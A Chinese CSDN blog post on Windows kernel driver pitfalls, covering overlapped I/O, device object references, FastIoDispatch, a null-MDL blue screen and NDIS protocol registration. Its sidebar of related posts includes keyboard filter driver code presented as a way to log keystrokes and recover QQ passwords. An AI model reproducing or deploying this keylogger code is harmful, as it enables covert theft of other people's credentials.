驱动开发坑总结

最新推荐文章于 2025-05-15 09:52:20 发布
最新推荐文章于 2025-05-15 09:52:20 发布
阅读量1.2k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/darthas/article/details/17596183

1. 用FILE_FLAG_OVERLAPPED打开设备时,ReadFile、WriteFile的OVERLAP参数不能为空,否则会异常,到不了驱动的派遣函数

2. 用IoGetDeviceObjectPointer得到FILE_OBJECT和DEVICE_OBJECT指针,用完后Deref文件对象就行了,设备对象千万别Deref,否则会损坏设备对象。他内部是ZwOpenFile再ObRefrenceObjectByHandle来得到FILE_OBJECT指针,再用它的成员得到DEVICE_OBJECT指针的,所以DEVICE_OBJECT不要deref

3. IoDriverObjectType,这个未公开的变量可以声明一下就用,但在vista以前是POBJECT_TYPE类型,后面变成了POBJECT_TYPE*类型。在ObRefrenceObjectByName等函数中要注意

4. 文件系统驱动或者过滤驱动,一定要实现FastIoDispatch,哪怕函数里面直接返回false也可以。楚狂人和wowocook的书里说不实现也可以,但自己试不实现的确会蓝屏,从wrk的代码里看,NtReadFile、NtWriteFile等确实会直接调用FastIoDispatch

    if (fileObject->PrivateCacheMap) {
            IO_STATUS_BLOCK localIoStatus;
            ASSERT(fastIoDispatch && fastIoDispatch->FastIoRead);
            //
            //  Negative file offsets are illegal.
            //
            if (fileOffset.HighPart < 0) {
                if (eventObject) {
                    ObDereferenceObject( eventObject );
                }
                IopReleaseFileObjectLock( fileObject );
                ObDereferenceObject( fileObject );
                return STATUS_INVALID_PARAMETER;
            }
            if (fastIoDispatch->FastIoRead( fileObject,
                                            &fileOffset,
                                            Length,
                                            TRUE,
                                            keyValue,
                                            Buffer,
                                            &localIoStatus,
                                            deviceObject )

5.  pIrp->MdlAddress) 引发的蓝屏

PUCHAR pBuf = NULL;
if(pDeviceObject->Flags & DO_BUFFERED_IO)
pBuf = (PUCHAR)(pIrp->AssociatedIrp.SystemBuffer);
else if((pDeviceObject->Flags & DO_DIRECT_IO) )
pBuf = (PUCHAR)(MmGetSystemAddressForMdlSafe(pIrp->MdlAddress,NormalPagePriority));

很普通的一段代码却蓝屏了,看蓝屏代码是0xd1,DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.If kernel debugger is available get stack backtrace.

后来才发现是pIrp->MdlAddress为空,MmGetSystemAddressForMdlSafe里的一行代码, 

mov     rcx, [rbx+8]    ; MemoryDescriptorList
test    byte ptr [rcx+0Ah], 5

这里rcx为0,变成违例了,难道用户传过来的buffer为空? 改了下代码

else if((pDeviceObject->Flags & DO_DIRECT_IO) && pIrp->MdlAddress)//pIrp->MdlAddress为空时,MmGetSystemAddressForMdlSafe会引发蓝屏

这样就ok了


6. IoFreeIrp这个函数在内部是会完成irp的,所以用IoBuildAsynchronousFsdRequest 等函数创建的irp,用完后直接free就行了,不要再去complete了


7. Ndis协议驱动,inf里面写的服务名和PROTOCOL_CHARACTERISTICS里的ProtocolName要匹配,否则注册协议能成功但不会被系统回调。(坑死寡人了。。)


块设备驱动开发常见问题与解决方案汇总
操作系统内核探秘的博客
05-23 711
本文面向刚接触块设备驱动开发的工程师,以及遇到具体问题需要排查的中级开发者。覆盖从驱动初始化到IO请求处理的全流程常见问题,重点解决“设备识别失败”“IO请求丢失”“性能瓶颈”等高频问题。本文通过“故事引入→核心概念→问题分类→实战示例→工具推荐”的结构展开,先通过小明开发驱动的故事引出问题,再用生活比喻解释块设备核心组件,接着分场景解析问题,最后用虚拟驱动示例演示解决方案。gendisk:设备的“信息看板”,记录容量、操作函数等;请求队列:管理IO任务的“分拣中心”,支持合并和调度;bio。
基于Jetson Agx Xavier的驱动开发----------一个字符设备驱动(多设备驱动)
weixin_44927463的博客
07-10 1441
文章目录前言一、字符设备驱动开发的主要流程?二、驱动程序的编写1.驱动程序的组成2.驱动入口函数总结 前言 这段时间学习驱动开发,手里只有一块jetson开发板,但是所有驱动开发教程都是针对于特定的学习板,针对于jetson开发板没有,虽然他们的开发流程可以借鉴,但是有许多地方不一样,在此记录一下开发流程和踩到的,如需具体理论知识,请参考正点原子的驱动开发教程/顺便提一嘴,之前以为正点原子只是在裸板开发上的教程特别好,这段时间看了他们嵌入式linux驱动开发指南,不得不说,是真的好,建议小白去学习一下.
windows驱动之踩之旅
even的博客
12-08 506
2018/12/8  写读驱动练手 设备名定义出错,导致使用DriverMonitor时加载失败,报error(3)  正确定义:\\Device\\xxx 注意格式,前面不能打错,xxx为设备名称    卸载驱动例程发生蓝屏 引用了空指针 read例程里使用RtlFillMemory导致蓝屏,它和memset参数shun顺序不一致...
Windows 驱动开发 新手入门(四)
Doub1's Blog
06-21 2615
本篇文章介绍一下设备对象,这是写驱动过滤的基础,比如键盘,串口等等的过滤。是的缩写,直译就是物理设备对象,一般来说,就是在就是的设备对象。 只能返回设备对象地址。 指向包含 Unicode 字符串的缓冲区的指针,该字符串是设备对象的名称。 指定表示所需访问的。 通常 ,DesiredAccess指定FILE_READ_DATA。 不经常指定FILE_WRITE_DATA或FILE_ALL_ACCESS访问权限。 指向表示相应设备对象到用户模式代码的文件对象的指针(如果调用成功)。 指向表示命名逻辑、虚
安全芯片NRSEC3000硬件使用手册v1.5下载:确保数据安全与系统稳定的利器
最新发布
gitblog_06756的博客
05-15 309
安全芯片NRSEC3000硬件使用手册v1.5下载:确保数据安全与系统稳定的利器 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 在数字化时代,数据安全显得尤为重要。为了满足这一需求,安全芯片NRSEC3000硬件使用手册v1.5下载资源应运而生。此仓库提供了南瑞安全接入资料的最新版本,详尽地介绍了NRSEC3000安全芯片的硬件规格、安装步骤、使用方法以及注意事项,帮...
QQ密码记录程序
05-15
http://blog.youkuaiyun.com/xiaoxiao108/article/details/7563159 最近看了看c++,写个程序玩玩。因为用户态代码不好截取到qq密码,写个键盘分层驱动。试了试效果还可以。 开发环境 vs2008 winddk ddkwizard windowsxp Dbgview 实现方法 1.把过滤驱动挂载到键盘驱动上面 2.设置完成例程 3.通过KdPrint输出键盘扫描码到DebugView 4. 从DebugView的日志文件中读出键盘按键。 具体代码 1.把过滤驱动挂载到KeyBoardClass0上面 PFILE_OBJECT fileOjbect; PDEVICE_OBJECT deviceObject; UNICODE_STRING deviceName; PDEVICE_EXTENSION pdx; PDEVICE_OBJECT filterDeviceObject; PDEVICE_OBJECT targetDevice; fileOjbect=NULL; RtlInitUnicodeString(&deviceName;,L"\\Device\\KeyBoardClass0"); status=IoGetDeviceObjectPointer(&deviceName;,FILE_ALL_ACCESS,&fileOjbect;,&deviceObject;); pdoDeviceObj->Flags |= DO_BUFFERED_IO; pdx=(PDEVICE_EXTENSION)pdoDeviceObj->DeviceExtension; pdx->pDevice=pdoDeviceObj; pdx->ustrDeviceName=usDeviceName; filterDeviceObject=((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->pDevice; targetDevice=IoAttachDeviceToDeviceStack(filterDeviceObject,deviceObject); ((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->TargetDevice=targetDevice; filterDeviceObject->DeviceType=targetDevice->DeviceType; filterDeviceObject->Characteristics=targetDevice->Characteristics; filterDeviceObject->Flags&=~DO_DEVICE_INITIALIZING; filterDeviceObject->Flags|=(targetDevice->Flags&(DO_DIRECT_IO|DO_BUFFERED_IO)); ObDereferenceObject(fileOjbect); return STATUS_SUCCESS; 2.设置完成例程 PDEVICE_EXTENSION pdx; pdx=(PDEVICE_EXTENSION)DeviceObject->DeviceExtension; IoCopyCurrentIrpStackLocationToNext(Irp); IoSetCompletionRoutine(Irp,MyIoCompletion,NULL,TRUE,TRUE,TRUE); NTSTATUS status=IoCallDriver(pdx->TargetDevice,Irp); return status; 3.输出键盘按键的扫描码 NTSTATUS MyIoCompletion(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context) { if(NT_SUCCESS(Irp->IoStatus.Status)) { PKEYBOARD_INPUT_DATA keys = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer; if(keys->Flags==0x0001||keys->Flags==0x0003) KdPrint(("x",keys->MakeCode)); } if(Irp->PendingReturned) { IoMarkIrpPending(Irp); } return STATUS_SUCCESS; } 使用步骤 1.安装驱动 用DriverMonitor加载并运行Driver1.sys驱动文件 2.打开Dbgview,当按键时就可以看到dbgview中记录下的键盘扫描码 3.在dbgview中选择记录日志文件,处理下日志文件就可以得到qq密码了。 偶c语言菜鸟,欢迎大神们批评教育 不足的地方很多啊 多多交流 谢谢 邮箱328452421@qq.com http://blog.youkuaiyun.com/xiaoxiao108/article/details/7563159
最简单的驱动helloWDM
05-07
这是一个最简单的驱动程序,新手可以看一下。这是驱动的第一步!
11.driverbase-IoGetDeviceObjectPointer源码(need ObDereferenceObject)
hgy413的专栏
12-25 1542
DDK Build编译的时候,使用3个文件来描述被编译的源码,其中SOURCES和Makefile是必须的,而DIRS则只在划分目录的时候有用。Makefile在这里作用并不大但是必须和SOURCES文件成对出现,关键还是SOURCES和DIRS文件。 SOURCES文件用于描述其所在目录下,有哪些文件参与编译,编译的结果应该是什么(是一个lib还是一个sys?),输出目录在哪里,要传递
驱动开发环境以及双机调试环境搭建
C++入门到放弃
10-19 4211
工作将近三个月了,做了几个项目,想在这里总结一下,方便以后自己或者大家借鉴。最近一个项目里需要做一个文件过滤驱动,我打算把整个过程中遇到的和解决方法,总结一下。这篇博客主要帮助大家实现驱动程序的开发环境搭建以及双机调试的环境搭建。因为我需要面对的操作系统比较广,所以需要两个开发环境才可以基本覆盖(如果你不需要面对很多操作系统,可以把主机作为开发机以及调试机,虚拟机作为测试机) 这里使用vs201
《Windows驱动开发技术详解》学习笔记
热门推荐
Sagittarius_Warrior的博客
02-13 2万+
Abstract   如果推荐 Windows 驱动开发的入门书,我强烈推荐《Windows驱动开发技术详解》。但是由于成书的时间较早,该书中提到的很多工具和环境都已不可用或找不到,而本文搜集了大部分的工具,并在 win10X64 上安装开发环境,在 win7x86 上进行实验,趟过了不少实际编译和测试中遇到的。此外,本文也对相关章节的重点进行了总结,全文目录如下: 全书导读 开发和调试 驱...
【外设驱动开发速成】:在STM32工程中快速集成与开发外设驱动
本文全面介绍了外设驱动开发的各个方面,首先概述了外设驱动开发的重要性与基础概念。随后深入探讨了STM32硬件平台及其外设,包括核心架构、外设资源与特性,以及外设驱动的作用。文章详细阐述了外设驱动开发环境的...
求助:关于IoCreateFileSpecifyDeviceObjectHint返回结果是STATUS_INVALID_DEVICE_OBJECT_PARAMETER的问题
myworldbig的专栏
07-25 2790
想在sfcreate中用IoCreateFileSpecifyDeviceObjectHint打开一个文件来判断文件是否存在,如果打开同盘的文件可以实现(返回STATUS_OBJECT_NAME_NOT_FOUND
一个差点被IoGetDeviceObjectPointer搞死的菜鸟
Vinx Blog
04-13 2596
一个差点被IoGetDeviceObjectPointer搞死的菜鸟  最近被迫学习Windows驱动开发(有多少人跟我一样不是主动去学的),感觉有所得之后就写了个读取PCI配置信息的小小小小的驱动,结果。。。。。。。。。。。。成功了。当然要是真的成功了下面的内容就没有意义了。一次幸运的手贱,我把测试程序同时打开了好多个,于是系统很光荣的牺牲了。   。。。。。。   //此处省略N次摧残系统的
驱动对象(DRIVER_OBJECT)
YL_WH的专栏
09-06 1157
驱动对象(DRIVER_OBJECT)  每个驱动程序对象代表了一个加载了的内核模式驱动程序映像.这个驱动对象就是以 DRIVER_OBJECT结构体的形式存在的.这个驱动对象的指针从驱动程序的DriverEntry函数 或AddDevice函数的参数传入的. typedef struct {     PDEVICE_OBJECT DeviceObject;     // 设备对
蓝屏总结(一) ——基本分析方法
VinWqx的博客
07-20 1万+
目录 一、蓝屏造成原因 二、通常的排查步骤 三、Debug步骤 四、使用Driver Verifier进行排查 五、Debug示例 1、分析示例 1 2、分析示例 2 一、蓝屏造成原因 关于停止错误(蓝屏或者错误检查)没有简单的解释,包含很多因素,目前大量研究表明停止错误通常不是由微软Windows组件导致的,而是厂商的硬件驱动或者三方软件的驱动,包括声卡、无线网卡、安全程序等等。 crash的根因一般都是由三方驱动代码引起的,另外一小部分是硬件问...
Windbg核心调试之dump分析
dyc13的专栏
04-27 2732
文章标题:Windbg核心调试之dump分析调试环境:winxp sp2+windbg ver:6.6.0007.5+vmware 5.5.2附件:点击下载一.Dump文件的产生,意义和类型    当系统发生错误是,最常见的就是蓝屏(Blue screen),这时就会在系统目录下产生一个Dump文件,如MEMORY.DMP 。这个文件的主要意义在于分析系统错误发生的原因,以作出解决的方法。
Windbg内核调试之四: Dump文件分析
fangchao918628的专栏
12-23 1452
Dump 文件分析很大程度上就是分析蓝屏产生的原因。这种系统级的错误算是Windows提示错误中比较严重的一种(更严重的还有启动黑屏等硬件或软件兼容性错误等等)。说它是比较严重,是因为毕竟Windows还提供了dump文件给用户分析,至少能比较容易的找到错误的原因。一般蓝屏要么是内核程序中的异常或违规,要么是数据结构的损坏,也有boot或shutdown的时候内核出错。有时候蓝屏是一闪而过,紧接着
linux驱动开发学习路线
02-27
嗯,用户想了解Linux驱动开发的学习路线,我得好好理清楚思路。首先,用户可能是刚开始接触Linux驱动开发,或者是已经有了一些编程基础,想转行到这个领域。需要从基础开始讲起,逐步深入,确保他能跟上。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值